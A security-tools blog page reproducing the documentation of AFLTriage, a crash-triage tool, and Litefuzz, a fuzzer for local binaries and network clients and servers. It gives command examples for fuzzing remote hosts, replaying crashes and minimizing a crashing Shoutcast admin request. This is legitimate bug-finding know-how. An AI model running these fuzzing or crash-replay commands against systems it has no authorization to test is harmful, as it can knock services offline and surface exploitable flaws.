Normal view

There are new articles available, click to refresh the page.
Before yesterdayKitPloit - PenTest & Hacking Tools

AFLTriage - Tool To Triage Crashing Input Files Using A Debugger

By: Zion3R
9 December 2021 at 20:30


AFLTriage is a tool to triage crashing input files using a debugger. It is designed to be portable and not require any run-time dependencies, besides libc and an external debugger. It supports triaging crashes generated by any program, not just AFL, but recognizes AFL directories specially, hence the name.

Some notable features include:

  • Multiple report formats: text, JSON, and raw debugger JSON
  • Parallel crash triage
  • Crash deduplication
  • Sanitizer report parsing
  • Supports binary targets with or without symbols/debugging information
  • Source code and variables will be annotated in reports for context

Currently AFLTriage only supports GDB and has only been tested on Linux C/C++ targets. Note that AFLTriage does not classify crashes by potential exploitablity. Accurate exploitability classification is very target and scenario specific and is best left to specialized tools and expert analysts.


Usage

Usage of AFLTriage is quite straightforward. You need your inputs to triage, an output directory for reports, and the binary and its arguments to triage.

Example:

$ afltriage -i fuzzing_directory -o reports ./target_binary --option-one @@
AFLTriage v1.0.0

[+] GDB is working (GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1 - Python 3.6.9 (default, Jan 26 2021, 15:33:00))
[+] Image triage cmdline: "./target_binary --option-one @@"
[+] Reports will be output to directory "reports"
[+] Triaging AFL directory fuzzing_directory/ (41 files)
[+] Triaging 41 testcases
[+] Using 24 threads to triage
[+] Triaging [41/41 00:00:02] [####################] CRASH: ASAN detected heap-buffer-overflow in buggy_function after a READ leading to SIGABRT (si_signo=6) / SI_TKILL (si_code=-6)
[+] Triage stats [Crashes: 25 (unique 12), No crash: 16, Errored: 0]

Similar to AFL the @@ is replaced with the path of the file to be triaged. AFLTriage will take care of the rest.

Building and Running

You will need a working Rust build environment. Once you have cargo and rust installed, building and running is simple:

cd afltriage-rs/
cargo run --help

<compilation>

Finished dev [unoptimized + debuginfo] target(s) in 0.33s
Running `target/debug/afltriage --help`

<AFLTriage usage>
...

Extended Usage

debugging output of triage operations. -h, --help Prints help information -V, --version Prints version information ARGS: <command>... The binary executable and args to execute. Use '@@' as a placeholder for the path to the input file or --stdin. Optionally use -- to delimit the start of the command. ">
afltriage 1.0.0
Quickly triage and summarize crashing testcases

USAGE:
afltriage -i <input>... -o <output> <command>...

OPTIONS:
-i <input>...
A list of paths to a testcase, directory of testcases, AFL directory, and/or directory of AFL directories to
be triaged. Note that this arg takes multiple inputs in a row (e.g. -i input1 input2...) so it cannot be the
last argument passed to AFLTriage -- this is reserved for the command.
-o <output>
The output directory for triage report files. Use '-' to print entire reports to console.

-t, --timeout <timeout>
The timeout in milliseconds for each testcase to triage. [default: 60000]

-j, --jobs <jobs>
How many threads to use during triage.

--report-formats <report_format s>...
The triage report output formats. Multiple values allowed: e.g. text,json. [default: text] [possible
values: text, json, rawjson]
--bucket-strategy <bucket_strategy>
The crash deduplication strategy to use. [default: afltriage] [possible values: none, afltriage,
first_frame, first_frame_raw, first_5_frames, function_names, first_function_name]
--child-output
Include child output in triage reports.

--child-output-lines <child_output_lines>
How many lines of program output from the target to include in reports. Use 0 to mean unlimited lines (not
recommended). [default: 25]
--stdin
Provide testcase input to the target via stdin instead of a file.

--profile-only
Perform environment chec ks, describe the inputs to be triaged, and profile the target binary.

--skip-profile
Skip target profiling before input processing.

--debug
Enable low-level debugging output of triage operations.

-h, --help
Prints help information

-V, --version
Prints version information


ARGS:
<command>...
The binary executable and args to execute. Use '@@' as a placeholder for the path to the input file or
--stdin. Optionally use -- to delimit the start of the command.

Related Projects



Litefuzz - A Multi-Platform Fuzzer For Poking At Userland Binaries And Servers

By: Zion3R
3 March 2022 at 11:30


Litefuzz is meant to serve a purpose: fuzz and triage on all the major platforms, support both CLI/GUI apps, network clients and servers in order to find security-related bugs. It simplifies the process and makes it easy to discover security bugs in many different targets, across platforms, while just making a few honest trade-offs.


It isn't built for speed, scalability or meant to win any prizes in academia. It applies simple techniques at various angles to yield results. For console-based file fuzzing, you should probably just use AFL. It has superior performance, instrumention capabilities (and faster non-instrumented execs), scale and can make freakin' jpegs out of thin air. For networking fuzzing, the mutiny fuzzer also works well if you have PCAPs to replay and frizzer looks promising as well. But if you want to give this one a try, it can fuzz those kinds of targets across platforms with just a single tool.

./ and give your target... a lite fuzz.

$ sudo apt install latex2rtf

$ ./litefuzz.py -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -n 1000 -z
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 1
iterations: 1000
mutator: random(mutators)

@ 1000/1000 (3 crashes, 127 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (1000) iterations with (3) unique crashes and 127 dups
>> check crashes/latex2rtf for more details

This is a simple local target which AFL++ is perfectly capable of handling and just quickly given as an example. Litefuzz was designed to do much more in the way of network and GUI fuzzing which you'll see once you dive in.

why

Yes, another fuzzer and one that doesn't track all that well with the current trends and conventions. Trade-offs were made to address certain requirements. These requirements being a fuzzer that works by default on multiple platforms, fuzzes both local and network targets and is very easy to use. Not trying to convince anybody of anything, but let's provide some context. Some targets require a lot of effort to integrate fuzzers such as AFL into the build chain. This is not a problem as this fuzzer does not require instrumentation, sacraficing the precise coverage gained by instrumentation for ease and portability. AFL also doesn't support network fuzzing out of the box, and while there are projects based on it that do, they are far from straightforward to use and usually require more code modifications and harnesses to work (similar story with Libfuzzer). It doesn't do parallel fuzzing, nor support anything like the blazing speed improvments that persistent mode can provide, so it cannot scale anywhere close to what fuzzers with such capabilities. Again, this is not a state-of-the-art fuzzer. But it doesn't require source code, properly up a build or certain OS features. It can even fuzz some network client GUIs and interactive apps. It lives off the land in a lot of ways and many of the features such as mutators and minimization were just written from scratch.

It was designed to "just work" and effort has been put into automating the setup and installation for the few dependencies it needs. This fuzzer was written to serve a purpose, to provide value in a lot of different target scenarios and environments and most importantly and for what all fuzzers should ultimately be judged on: the ability to find bugs. And it does find bugs. It doesn't presume there is target source code, so it can cover closed source software fairly well. It can run as part of automation with little modification, but is geared towards being fun to use for vulnerability researchers. It is however more helpful to think of it as a R&D project rather than a fully-fledged product. Also, there's no complicated setup w here it's slightly broken out of the box or needs more work to get it running on modern operating systems. It's been tested working on Ubuntu Linux 20.04, Mac OS 11 and Windows 10 and comes with fully functional scripts that do just about everything for you in order to setup a ready-to-fuzz environment.

Once the setup script completes, it only takes a few minutes to get started fuzzing a ton of different targets.

how it works

Litefuzz supports three different modes: local, client and server. Local means targeting local binaries, which on Linux/Mac are launched via subprocess with automatic GDB and LLDB triage support respectively on crashes and via WinAppDbg on Windows. Crashes are written to a local crash directory and sorted by fault type, such as read/write AVs or SIGABRT/SIGSEGV along with the file hashes. All unique crashes are triaged as it fuzzes and this data along with target output (as available) is also captured and placed as artifacts in the same directory. It's also possible to replay crashes with --replay and providing the crashing file. In local client mode, the input directory should contain a server greeting, response or otherwise data that a client would expect when connecting to a server. As of now only one "shot" is implementated for network fuz zing with no complex session support. The client is launched via command line and debugged the same as when file fuzzing. A listener is setup to support this scenario, yes its a slow and borderline manual labor but it works. If a crash is detected, it is replayed in gdb to get the triage details. In remote client mode, this works the same expect for no local debugging / crash triage. In local server mode, it's similar to local client mode and for remote server mode it just connects to a specified target and send mutated sample client data that the user specifies as inputs, but only a simple "can we still connect, if not then it probably crashed on the last one" triage is provided.

There are a few mutation functions written from scratch which mostly do random mutations with a random selection of inputs specified by the -i flag. For file fuzzing, just select local mode and pass it the target command line with FUZZ denoting where the app expects the filename to parse, eg. tcpdump -r FUZZ along with an input directory of "good files" to mutate. For network client fuzzing, it's similar to local fuzzing, but also provide connection specifics via -a. And if you want to fuzz servers, do server mode and provide a protocol://address:port just like for clients.

It fuzzes as fast as the target can consume the data and exit, such as the case for most CLI applications or for as long as you've determined it needs before the local execution or network connection times out, which can be much slower. No fancy exec or kernel tricks here. But of course if you write a harness that parses input and exits quickly, covering a specific part of the target, that helps too. But at that point, if you can get that close to the target, you're probably better off using persistant mode or similar features that other fuzzers can offer.

In short...

what it does

  • runs on linux, windows and mac and supports py2/py3
  • fuzzes CLI/GUI binaries that read from files/stdin
  • fuzzes network clients and servers, open source or proprietary, available to debug locally or remote
  • diffs, minimization, replay, sorting and auto-triaging of crashes
  • misc stuff like TLS support, golang binary fuzzing and some extras for Mac
  • mutates input with various built-in mutators + pyradamsa (Linux)

what it doesn't do

  • native instrumentation
  • scale with concurrent jobs
  • complex session fuzzing
  • remote client and server monitoring (only basic checks eg. connect)

support

Primarily tested on Ubuntu Linux 20.04 (lightly tested on 21.04), Windows 10 and Mac OS 11. The fuzzer and setup scripts may work on slightly older or newer versions of these operating systems as well, but the majority of research, testing and development occurred in these environments. Python3 is supported and an effort was made to make the code compatiable with Python2 as well as it's necessary for fuzzing on Windows via WinAppDbg. Platform testing primarily occured on Intel-based hardware, but things seem to mostly work on Apple's M1 platform too (notable exceptions being on Linux the exploitable plugin for GDB probably isn't supported, nor is Pyradamsa). There are also setup scripts in setup/ to automate most or all of the tasks and depencency installation. It can generally fuzz native binaries on each platform, wh ich are often compiled in C/C++, but it also catch crashes for Golang binaries as well (experimental).

python versions

Python3 is supported for Linux and Mac while Python2 is required for Windows.

Why Py3 for Linux and Mac? Pyautogui, Pyradamsa (Linux only), better socket support on Mac.

Why Py2 for Windows? Winappdbg requires Py2.

linux

GDB for debugging and exploitable for crash triage. If it's OSS, you can build and instrument the target with sanitizers and such, otherwise there's some memory debuggers we can just load at runtime.

This installation along with the python dependencies and other helpful stuff has been automated with setup/linux.sh. Recommended OS is Ubuntu 20.04 as that is where the majority of testing occurred.

mac

Instead of gdb, we use lldb for debugging on OS X as it's included with the XCode command line tools. Being an admin or in the developer group should let you use lldb, but this behavior may differ across environments and versions and you may need to run it with sudo privileges if all else fails.

The one thing you'll manually need to do is turn off SIP (in recovery, via cmd+R or use vmware fusion hacks). Otherwise, auto-triage will fail when fuzzing on Tim Apple's OS.

Almost all of the setup has been automated with the setup/mac.sh script, so you can just run it for a quick start.

windows

WinAppDbg is used for debugging on Windows with the slight caveat that stdin fuzzing isn't supported.

Like the automated setups for the other operating systems, chocolatey helps to automate package installation on windows. Run setup/windows.bat in the litefuzz root directory as Administrator to automate the installations. It will install debugging tools and other dependencies to make things run smoothly.

targets

This is a list of the types of targets that have been tested and are generally supported.

  • Local CLI/GUI apps that parse file formats or stdin

    • debug support
  • Local CLI/GUI network client that parses server responses

    • debug support for CLIs
    • limited debug support for GUIs
  • Local CLI network server that parses client requests

    • debug support (caveat: must able to run as a standalone executable, otherwise can be treated as remote)
  • Local GUI network server that parses client requests

    • theoretically supported, untested
  • Remote CLI/GUI network client that parses server responses

    • no debug support
  • Remote CLI/GUI network server that parses client requests

    • no debug support
    • exception being on Mac and using attach or reportcrash features

Again, the fuzzer can run on and support local apps, clients and servers on Linux, Mac and Windows and of course can fuzz remote stuff independent of the target platform.

triage

  • Local CLI/GUI apps that parse file formats or stdin

    • run app, catch signals, repro by running it again inside a debugger with the crasher
  • Local CLI/GUI network client that parses server responses

    • run app, catch signals, repro by running it again inside a debugger with the crasher
  • Local GUI/CLI network server that parses client requests

    • run app in debugger, catch signals, repro by running it again inside a debugger with the crasher
  • Remote CLI/GUI network client that parses server responses

    • no visiblity, collect crashes from the remote side
    • can manually write supporting scripts to aid in triage
  • Remote CLI/GUI network server that parses client requests

    • no visiblity, collect crashes from the remote side
    • can manually write supporting scripts to aid in triage
    • exception on Mac are the attach and reportcrash options, which can be used to enable some triage capabilities

getting started

Most of the setup across platforms has been automated with the scripts in the setup directory. Simply run those from the litefuzz root and it should save you a lot of time and help enable some of what's needed for automated deployments. It's useful to use a VM to setup a clean OS and fuzzing environment as among other things its snapshot capabilities come in handy.

See INSTALL.md for details.

tests

unit tests

There are a few simple unit and functional tests to get some coverage for Litefuzz, but it is not meant to be complete.

py2> pytest
py3> python3 -m pytest

This will run pytest for test_litefuzz.py in the main directory and provide PASS/FAIL results once the test run is finished.

crashing app tests

A few examples of buggy apps for testing crash and triage capabilities on the different platforms can be found in the test folder.

  • (a) null pointer dereference
  • (b) divide-by-zero
  • (c) heap overflow
  • (d-gui) format string bug in a GUI
  • (e) buffer overflow in client
  • (f) buffer overflow in server

They are automatically built during setup and you can run them on the command line, in a debugger or use them to test as fuzzing targets. If running on Windows command line, check Event Viewer -> Windows Logs -> Application to see crashes.

options

There are a ton of different options and features to take advantage of various target scenarios. The following is a brief explanation and some examples to help understand how to use them.

crash directory

-o lets you specify a crash directory other than the default, which is the crashes/ in the local path. One can use this to manage crash folders for several concurrent fuzzing runs for different apps at the same time.

insulate mode

-u insulates the target application from the normal fuzzing process, eg. execs or sending packets over and over and checking for crashes. Instead, this mode was made for interactive client applications, eg. Postman where you can script inside the application to repeat connections for client fuzzing. The target is ran inside of a debugger, the fuzzer is paused to get the user time to click a few buttons or sets the target's config to make it run automatically, user resumes and now you are fuzzing interactive network clients.

litefuzz -lk -c "/snap/postman/140/usr/share/Postman/_Postman" -i input/http_responses -a tcp://localhost:8080 -u -n 100000 -z

Insulate mode + refresh can be used for interactive clients, eg. run FileZilla in a debugger, but keep hitting F5 to make it reconnect to the server for each new iteration. Also, fuzzing local CLI/GUI servers are only started and ran once inside a debugger to make the process a little more efficient.

--key also allows you to send keys while fuzzing interactive targets, such as fuzzing FileZilla's parsing of FTP server responses by sending "refresh connection" with F5.

litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp/filezilla -u -pp --key "F5" -n 100 -z glibc

note: insulate mode has only been tested working on Linux and is not supported on Windows.

timeout

-x secs allows you to specify a timeout. In practice, this is more like "approx how long between iterations" for CLI targets and an actual timeout for GUIs.

mutators

--mutator N specifies which mutator to use for fuzzing. If the option is not provided, a random choice from the list of available mutators is chosen for each fuzzing iteration. These mutators were written from scratch (with the exception of Radamsa of course). And while they have been extensively tested and have held up pretty well during millions of iterations, they may have subtle bugs from time to time, but generally this should not affect functionality.

FLIP_MUTATOR = 1
HIGHLOW_MUTATOR = 2
INSERT_MUTATOR = 3
REMOVE_MUTATOR = 4
CARVE_MUTATOR = 5
OVERWRITE_MUTATOR = 6
RADAMSA_MUTATOR = 7

note: Radamsa mutator is only available on Linux (+ Py3).

ReportCrash

--reportcrash is mac-specific. Instead of using the default triage system, it instructs the fuzzer to monitor the ReportCrash directory for crash logs for the target process. ReportCrash must be enabled on OS X (default enabled, but usually disabled for normal fuzzing). This feature is useful in scenarios where we can't run the target in a debugger to generate and triage our own crash logs, but we can utilize this core functionality on the operating system to gain visibility.

note: consider this feature experimental as we're relying on a few moving parts and components we don't directly control within the core MacOS system. ReportCrash may eventually stop working properly and responding after fuzzing for a while even after attempting to unload and reload it, so one can try rebooting the machine or resetting the snapshot to get it back in good shape.

sudo launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist

pause

Hit ctrl+c to pause the fuzzing process. If you want to resume, choose y or n to stop. This feature works ok across platforms, but may be less reliable when fuzzing GUI apps.

reusing crashes for variant finding

-e enables reuse mode. This means that if any crashes were found during the fuzzing run, they will be used as inputs for a second round of fuzzing which can help shake out even more bugs. Combine with -z for -ez bugs! Da-duph.

The following example is fuzzing antiword with 100000 iterations and then start another run with the same iteration count and options to reuse the crashes as input to try and grind out even more bugs.

litefuzz -l -c "antiword FUZZ" -i docs -n 100000 -ez

(or one could manually copy over crashes to an input directory to directly control the interations for the reuse run)

litefuzz -l -c "antiword FUZZ" -i docs-crashes -n 500000 -z

note: this mode is supported for local apps only.

memory debugging helpers

-z enables Electric Fence (or glib malloc debugging as fallback) on Linux, Guard Malloc on Mac and PageHeap on Windows. Also, -zz can be used to disable PageHeap after enabling it for an application. If you want to just flip it on/off without starting the fuzzer, just leave out the -i flag. During Windows setup, gsudo is installed and can be used to run elevated commands on the command line, such as turning on PageHeap for targets.

sudo litefuzz -l -c "notepad FUZZ" -i texts/files -z

sudo litefuzz -l -c "notepad FUZZ" -zz

On Linux, specific helpers can be chosen. For example, instead of just using glib malloc as a fallback, it can be selected.

litefuzz -l -c "geany FUZZ" -i texts/codes -z glibc

The default Electric Fence malloc debugger is great, but it doesn't work with all targets. You can test the target with EF and if it crashes, select the glibc helper instead.

checking live target output

If fuzzing local apps on Linux or Mac, you can cat /tmp/litefuzz/RUN_ID/fuzz.out to check what the latest stdout was from the target. RUN_ID is shown in the STATS information area when fuzzing begins. In the event that a crash occurs, stdout is also captured in the crashes directory as the .out file. Global stdout/stderr also goes to /tmp/litefuzz/out for debugging purposes as well for all fuzzing targets with the exception of insulated or local server modes which debugger output goes to /tmp/litefuzz/RUN_ID/out. Winappdbg doesn't natively support capturing stdout of targets (AFAIK), so this artifact is not available on Windows.

client and server modes

If the server can be ran locally simply by executing the binary (with or without some flags and configuration), you can pass it's command line with -c and it will be started, fuzzed and killed with a new execution every iteration. The idea here is trading speed for the ability avoid those annoying bugs which triggered only after the target's memory is in a "certain state", which can lead to false positives. Same deal with locally fuzzing network clients. It even supports TLS connections, generating certificates for you on the fly (allowing the user to provide a client cert when fuzzing a server that requires it and certificate fuzzing itself are other ideas here). Debugging support is not provided by Litefuzz when fuzzing remote clients and servers, so setup on that remote end is up to the user. For servers, we simply check if the server stopped responding and note the previous payload as the crasher. This works fine for TCP connections, but we don't quite have this luxury for UDP services, so monitoring the remote server is left up to either the ReportCrash feature (available on Mac), running the target in a debugger (via local server mode or manually) or crafting custom supporting scripts. Also, some servers may auto-restart or otherwise recover after crashing, but there may be signs of this in the logs or other artifacts on the filesystem which can parsed by supporting scripts written for a particular target.

local network examples

litefuzz -lk -c "wget http://localhost:8080" -a tcp://localhost:8080 -i input/http -z

litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -z

litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -o crashes/curl --tls -n 100000 -z

(open Wireshark and capture the response from a d, right click Simple Network Management Protocol -> Export Packet Bytes -> resp.bin)

litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3

litefuzz -ls -c "./sc_serv shoutcast.conf" -a localhost:8000 -i input/shouts -z

litefuzz -ls -c "snmpd" -i input/snmp -a udp://localhost:161 -z

quick notes

  • UDP sockets can act a little strange on Mac + Py2, so only Mac + Py3 has been tested and supported
  • Local network client fuzzing on Windows can be buggy and should be considered experimental at this time

remote network examples

Fuzzing remote clients and servers is a bit more challenging: we have no local debugging and rely on catching a halt in interaction between the two parties over the network to catch crashes. Also, since we are assumedly blind to what's happening on the other end, fuzzing ends when the client or server stops responding and needs to be restarted manually after the client or server is restored to a normal (uncrashed) state unless the user has setup scripts on the remote side to manage this process. Again, UDP complicates this further. Even sending a test packet to see if there's a listening service on a UDP port doesn't guarantee a reply. So it's possible to remotely fuzz network clients and servers, but there's a trade-off on visibility.

client

while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done

litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -pp -n 100

Client mode is more finicky here because it's hard to tell whether a client has actually crashed so it's not reconnecting or if the send/recv dance is just off as different clients can handle connections however they like. Also note that this just an example and that remote client fuzzing by nature is tricky and should be considered somewhat experimental.

server

The pros and cons of fuzzing a server locally or remotely can help you make a decision of how to approach a target when both options are available. Basically, fuzzing with the server in a debugger is going to be slower but you'll be able to get crash logs with the automatic triage, whereas fuzzing the server in remote mode (even pointing it to the localhost) will be much faster on average, but you lose the high visibility, debugger-based triage capabilities but it will give you time to manually restart the server after each crash to keep going before it exits (TCP servers only, feature does not support UDP-based servers).

Shoutcast

./sc_serv ...

litefuzz -s -a localhost:8000 -i input/shouts -n 10000

SSHesame

sshesame

litefuzz -s -a tcp://target:2022 -i input/ssh-server -p -n 1000000 -x 0.05

FTP

litefuzz -s -a tcp://target:21 -i input/ftp/req.txt -pp -n 1000

DNS

coredns -dns.port 10000

litefuzz -ls -c "coredns -dns.port 10000" -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000

or

litefuzz -s -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000

TLS

litefuzz -s -a tcp://hostname:8080 -i input/http --tls -n 10000

...
@ 48/10000 (1 crashes, 0 duplicates, ~7:13:18 remaining)

[!] check target, sleeping for 60 seconds before attempting to continue fuzzing...

note: default remote server mode delays between fuzzing iterations can make fuzzing sessions run reliably, but are pretty slow; this is the safe default, but one can use -x to set very fast timeouts between sessions (as shown above) if the target is OK parsing packets very quickly, unoffically nicknamed "2fast2furious" mode

For more on session-based protocols (such as FTP or SSH), see Multiple modes.

multiple data exchange modes

-p is for multiple binary data mode, which allows one to supply sequential inputs, eg. input/ssh directory containing files named "1", "2", "3", etc for each packet in the session to fuzz. This is meant to enable fuzzing of binary-based protocol implementations, such as SSH client.

ls input/ssh 1 2 3 4

xxd input/ssh/2 | head

00000000: 0000 041c 0a14 56ff 1297 dcf4 672d d5c9  ......V.....g-..
00000010: d0ab a781 dfcb 0000 00e6 6375 7276 6532 ..........curve2
00000020: 3535 3139 2d73 6861 3235 362c 6375 7276 5519-sha256,curv
00000030: 6532 3535 3139 2d73 6861 3235 3640 6c69 e25519-sha256@li
00000040: 6273 7368 2e6f 7267 2c65 6364 682d 7368 bssh.org,ecdh-sh
00000050: 6132 2d6e 6973 7470 3235 362c 6563 6468 a2-nistp256,ecdh
00000060: 2d73 6861 322d 6e69 7374 7033 3834 2c65 -sha2-nistp384,e
00000070: 6364 682d 7368 6132 2d6e 6973 7470 3532 cdh-sha2-nistp52
00000080: 312c 6469 6666 6965 2d68 656c 6c6d 616e 1,diffie-hellman
00000090: 2d67 726f 7570 2d65 7863 6861 6e67 652d -group-exchange-

Each packet is consumed into an array, a random index is mutated and replayed to fuzz the target.

litefuzz -lk -c "ssh -T test@localhost -p 2222" -a tcp://localhost:2222 -i input/ssh -o crashes/ssh -p -n 250000 -z glibc

And you can check on the target's output for the latest iteration.

authentication code incorrect">
cat /tmp/litefuzz/out
kex_input_kexinit: discard proposal: string is too large
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: string is too large

... and others like

ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: unknown or unsupported key type

ssh_askpass: exec(/usr/bin/ssh-askpass): No such file or directory
Host key verification failed.

Bad packet length 1869636974.
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect

-pp asks the fuzzer to check inputs for line breaks and if detected, treat those as multiple requests / responses. This is useful for simple network protocol fuzzing for mostly string-based protocol implementations, eg. ftp clients.

cat input/ftp/test
220 ProFTPD Server (Debian) [::ffff:localhost]
331 Password required for user
230 User user logged in
215 UNIX Type: L8
221 Goodbye

The fuzzer breaks each line into it's own FTP response to try and fuzz a client's handling of a session. There's no guarentee, however, that a client will "behave" or act in ways that don't allow a session to complete properly, so some trial and error + fine tuning for session test cases while running Wireshark can be helpful for understanding the differences in interaction between targets.

litefuzz -lk -c "ftp localhost 2121" -a tcp://localhost:2121 -i input/ftp -o crashes/ftp -n 100000 -pp -z

This can also be combined with -u for insulating GUI network targets like FileZilla.

litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp.resp -n 100000 -u -pp -z glibc

attaching to a process

If the target spawns a new process on connection, one can specify the name of a process (or pid) to attach to after a connection has been established to the server. This is handy in cases where eg. launchd is listening on a port and only launches the handling process once a client is connected. This is one feature that sort of blurs the line between local and remote fuzzing, as technically the fuzzer is in remote mode, yet we specify the target address as localhost and ask it to attach to a process.

./litefuzz.py -s -a tcp://localhost:8080 -i input/shareserv -p --attach ShareServ -x 1 -n 100000

note: currently this feature is only supported on Mac (LLDB) and for network fuzzing, although if implemented it should work fine for Linux (GDB) too.

crash artifacts

When a crash is encountered during fuzzing, it is replayed in a debugger to produce debug artifacts and bucketing information. The information varies from platform to platform, but generally the a text file is produced with a backtrace, register information, !exploitable type stuff (where available) and other basic information.

Memory dumps can be enabled on Windows by passing the --memdump or disabled with --nomemdump similar to how malloc debuggers are controlled via -z and -zz respectively. If enabled, the dump will also be loaded in the console debugger (cdbg) and !analyze -v crash analysis output is captured within an additional memory dump crash analysis log. Winappdbg already has !exploitable type analysis that we get in the initial crash analysis, so we just do !analyze here.

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump

or to disable memory dumps for an application

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --nomemdump

In addition to auto-crash triage, binary/string diffs (as appropriate) and target stdout (platform / target dependent) is also produced and repro files of course.

For local fuzzing, artifacts generally include diffs, stdout (linux/mac only), repro file and the crash log and information file.

$ ls crashes/latex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diff
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diffs
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.out
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.tex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.txt

On Windows, if memory dumps are enabled, a dump file will be generated and additional triage information will be written to an additional crash analysis log.

C:\litefuzz\crashes> dir
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.dmp
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.log
....

For remote fuzzing, artifacts may vary depending on the options chosen, but often include diffs, repro file and/or repro file directory (if input is a session with multiple packets), previous fuzzing iteration repro (prevent losing a bug in case its actually the crasher as remote fuzzing has its challenges) and crash log or brief information file.

ls crashes/serverd
REMOTE_SERVER_testbox.1_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_PREV_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diff
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diffs
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.txt
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.zz

ls crashes/serverd/REMOTE_SERVER_localhost_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_1.zz REMOTE_SERVER_localhost_NNNN_2.zz
REMOTE_SERVER_testbox.1_NNNN_3.zz REMOTE_SERVER_localhost_NNNN_4.zz

golang

Apparently when Golang binaries crash, they may not actually go down with a traditional SIGSEGV, even if that's what they say in the panic info (Linux tested). They may instead crash with return code 2. So I guess that's what we're going with :) I'm sure there's a better explanation out there for how this works and edge cases around it, but one can use --golang to try and catch crashes in golang binaries on Linux.

litefuzz -l -c "evernote2md FUZZ" -i input/enex -o crashes/evernote2md --golang -n 100000

repros

Crashing files are kept in the crashes/ directory (or otherwise specified by -o flag) along with diffs and crash info.

-r and passing a repro file (or directory) with the appropriate target command line / address setup will try and reproduce the crash locally or remote.

local example

litefuzz -l -c "latex2rtf FUZZ" -r crashes/latex2rtf/test.tex -z

local network example

./litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -r crashes/crash.raw

remote network example

litefuzz -s -a tcp://host:8000 -r crashes/crash.raw

remote network example (multiple packets)

litefuzz -s -a tcp://localhost:22 -r repro/dir/here

remove file

Some targets ask for a static outfile location as part of their command line and may throw an error if that file already exists. --rmfile is an option for getting around this while fuzzing where after each fuzzing iteration, it will remove the file that was generated as a part of how the target functions.

litefuzz -l -c "hdiutil makehybrid -o /tmp/test.iso -joliet -iso FUZZ" -i input/dmg --rmfile /tmp/test.iso -n 500000 -ez

minimization

Minimizing crashing files is an interesting activity. You can even infer how a target is parsing data by comparing a repro with a minimized version.

-m and passing a repro file with the target command line or address setup will attempt to generate a minimized version of the repro which still crashes the target, but smaller and without bytes that may not be necessary. During this minimization journey, it may even find new crashes. Only local modes are supported, but this still includes local client and server modes, so you can minimize network crashes as long as we can debug them locally.

For example, this request is the original repro file.

GET /admin.cgi?pass=changeme&mode=debug&option=donotcrash HTTP/1.1
Host: localhost:8000
Connection: keep-alive
Authorization: Basic YWRtaW46Y2hhbmdlbWU=
Referer: http://localhost:8000/admin.cgi?mode=debug

Now take a look at it's minimized version.

GET /admin.cgi?mode=debug&option=a
Authorization:s YWRtaW46Y2hhbmdlbWU
Referer:admin.cgi

One can make some guesses about what the target is looking for and even the root cause of the crash.

  1. The request is most important part
  2. option= can probably be a lot of different things
  3. The Host and Connection headers aren't neccesary
  4. Authorization header parsing is just looking for the second token and doesn't care if it's explicitly presenting Basic auth
  5. Referer is necessary, but only admin.cgi and not the host or URL

